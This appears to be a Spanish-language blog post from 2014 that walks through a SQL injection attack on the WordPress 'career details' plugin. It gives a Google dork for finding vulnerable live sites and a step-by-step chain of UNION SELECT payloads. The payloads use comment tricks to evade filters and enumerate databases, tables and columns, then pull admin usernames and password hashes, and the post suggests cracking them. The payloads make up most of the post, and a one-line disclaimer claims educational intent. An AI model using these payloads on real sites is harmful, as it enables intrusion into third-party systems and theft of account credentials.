martes, 21 de enero de 2014

Hacking all Wordpress carrer-details

Hoy es mi publicación numero 100, y esperaba que fuera especial y que mejor que comprometer los sitios basados en Wordpress.

Hoy vamos a poner en practicas lo que hemos aprendido con SQL Injection para hacerlo a lo grande!

Vamos a ello!!


Exploit publicado:
  1. # [+] Exploit Title: Wordpress All Version career details Sql Injection Vulnerability
  2. # [+] Google Dork: inurl:/career-details/?jobid=
  3. # [+] Date: 10/10/2013
  4. # [+] Exploit Author: Iranian_Dark_Coders_Team
  5. # [+] Discovered By: Black.Hack3r
  6. # [+] Version: All Version
  7. # [+] Security Risk: High
  8. # [+] Platforms: php
  9. # [+] Tested on: Windows 7


Afecta a todas las versiones con el plugin "career details" por medio de una vulnerabilidad de validación en los parametros SQL.

Buscamos con el dork el resultado de sitios web cacheados por Google.

Como siempre hacemos en las inyecciones sera poner nuestra comilla haber que pasa...

Si lo queremos hacerlo sobre nuestra red debemos insalar un Wordpress, rellenarla un poco e instalar el plugin de career-details y a probar.
Exploit: 
[url]/career-details/?jobid=3'


Prueba:
[url]/career-details/?jobid=3+order+by+4-- No Error


[url]/career-details/?jobid=3+order+by+5-- Error



Configurando para las salidas de parametros
[url]/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,2,3,4-- 



Sacar todas las bases de datos
[url]
/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(SCHEMA_NAME)*/)),3,4 /*!12345from*/ /*!12345INFORMATION_SCHEMa.SCHEMATA*/-- 






Buscando esta base de datos
[url]/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,database(),3,4 /*!12345from*/ wp_users--



Tablas de esa base de datos
[url]
/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(table_name)*/)),3,4 /*!12345from*/ /*!12345information_schema.tables*/ /*!12345where*/ /*!12345table_schema*/ =database()-- 



Columnas en la tabla wp_users 
[url]/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(COLUMN_NAME)*/)),3,4 /*!12345from*/ /*!12345information_schema.columns*/ /*!12345where*/ /*!12345table_name*/ =CHAR(119, 112, 95, 117, 115, 101, 114, 115)-- 





Sacar la usuario admin y contraseña
[url]/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(ID,0x3a,user_login,0x3a,user_pass)*/)),3,4 /*!12345from*/ wp_users--


Ahora buscaríamos un descifrador del hash, lo mas probable que sea MD5 y con suerte podemos tenerlo en un momento.


* Este post no tiene intención malintencionada , esta hecho con intención de aprender y ver los peligros en este caso de Wordpress por culpa de un plugin vulnerable que puede comprometer la seguridad del sitio. 

No hay comentarios:

Publicar un comentario